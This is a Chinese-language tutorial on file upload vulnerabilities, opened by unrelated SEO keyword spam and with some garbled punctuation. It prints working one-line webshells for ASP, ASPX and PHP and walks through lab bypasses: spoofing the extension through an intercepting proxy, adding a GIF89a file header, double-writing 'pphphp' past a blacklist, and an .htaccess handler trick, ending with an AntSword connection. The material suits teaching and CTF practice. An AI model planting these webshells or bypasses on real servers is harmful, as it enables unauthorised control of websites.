代理上海建站公司注册,官方网站欣赏,国内公司网站模板,南京浦口住房与城乡建设局网站漏洞介绍#xff1a; 现代互联网的Web应用程序中#xff0c;上传文件是一种常见的功能#xff0c;因为它有助于提高业务效率#xff0c;如企业的OA系统#xff0c;允许用户上传图片#xff0c;视频#xff0c;头像和许多其他类型的文件。然而向用户提供的功能越多#…漏洞介绍 现代互联网的Web应用程序中上传文件是一种常见的功能因为它有助于提高业务效率如企业的OA系统允许用户上传图片视频头像和许多其他类型的文件。然而向用户提供的功能越多Web应用受到攻击的风险就越大如果Web应用存在文件上传漏洞那么恶意用户就可以利用文件上传漏洞剑可执行脚本程序WebShell上传到服务器中获得网站的权限然后可以进一步对服务器进行入侵扩大控制权限。 漏洞利用 非法用户可以利用上传的恶意脚本文件控制整个网站甚至服务器。这个恶意的脚本文件又被称为 WebShell是以 ASP、PHP、JSP等网页设计语言编写的网页脚本通常也叫作网页后门。攻击者在入侵了一个网站后常会将 WebShell上传到网站的目录下或者插入正常的网页中然后使用浏览器或者对应的 WebShell客户端来访问这些后门将会得到一个命令执行的环境以达到控制网站服务器的目的。 一句话木马 tips:这下面的木马蚁剑连接的时候密码都为x ASP的一句话木马
1. %eval request(x)%
2. %execuate request(x)% ASPX的一句话木马
1. % Page LanguageJscript% %eval (Request.Item[x],unsafe);%) PHP的一句话木马
1. ?php eval($_POST[x]); ?
2. ?php assert($_POST[x]); ? 漏洞实战样例 1.JS前端绕过
靶场题目 此时我们上传一个一句话木马。 说明前端让后缀为.php的文件是黑名单了 我们可以先改为.jpg文件然后用bp抓包在包里面改为.php因为此时我们已经通过了前端验证了 将.jpg改为.php就可以上传成功了 上传成功了 复制图片地址然后将后缀改成.php php代码被执行成功。 2.文件头绕过 文件上传时服务器除了JS前端检验有的检验还会对上传的文件进行文件头检测。文件头信息通常在一个文件的开头我们用查看十六进制的方式可以查看一个文件的文件头信息。这也是最方便、最快捷的用来辨别一个文件真实内容的方法。
常见的文件头标志如下
JPEG (jpg)文件头FFD8FF PNG (png)文件头89504E47 GIF (gif)文件头47494638 HTML (html)文件头68746D6C3E ZIP Archive (zip)文件头504B0304 RAR Archive (rar)文件头52617221 Adobe Acrobat (pdf)文件头255044462D312E MS Word/Excel (xls.or.doc)文件头D0CF11E0
tips一般图片文件我们都在前面加入GIF89a来绕过
不加文件头的时候 加了文件头的时候 然后靶场实战吧 同样先转为图片.jpg文件上传改包 上传成功了 3.黑名单缺陷 限制文件上传的方式千奇百怪白名单与黑名单就是常见的限制方式。白名单是设置可以让用户上传的文件格式白名单以外的文件格式都不能通过。黑名单是设置用户不能上传的文件格式黑名单以外的文件格式都能通过。所以在一般情况下白名单比黑名单限制的用户要更多一些。
上传.php文件会失败的就是黑名单过滤了 本题给了提示会把黑名单里面的字符串删掉然后继续拼接路径。这时候我们可以想到双写绕过 如 php被删掉变成 什么都没有 pphphp中间的php被删掉然后前面的p和后面的hp合成新的php这就是双写绕过 这里我们将.jpg改为.pphphp,后端遇到pphphp的时候会把它变成php
成功上传了 4. .htaccess文件 .htaccess文件时Apache服务中的一个配置文件它负责相关目录下的网页配置。通过htaccess文件可以帮助我们实现网页301重定向、自定义404错误页面改变文件扩展名、允许/阻止特定的用户或者目录的访问禁止目录列表配置默认文档等功能 其中.htaccess文件内容SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析那么无论上传任何文件只要符合php语言代码规范就会被当做PHP执行。 我们先把.htaccess文件上传上去然后上传一个带有一句话木马的.jpg文件当你访问.jpg文件时这个文件会被当成php执行 我们的.htaccess文件根muma.jpg文件在一个目录下我们访问muma.jpg文件看看 .htaccess适用范围比.user.ini小他好像只能用于apache服务器上的大家做ctf题的时候可能会遇到我这里其实演示失败了....但是过程就是这样的 一句话木马的使用 为什么现在才写一句话木马因为你首先得会上传php文件是吧不然上传的木马是个图片怎么用呢
我喜欢用的一句话木马tipsGIF89a可以绕过后端关于图片的一些验证。phpinfo可以判断是否上传的文件可以按照php执行会有回显。 先上传成功木马先 然后用蚁剑连接他
先点击测试连接如果连接成功的话点击添加
双击它我们就可以看到目标的所有目录文件了 所以这就是一句话木马的危害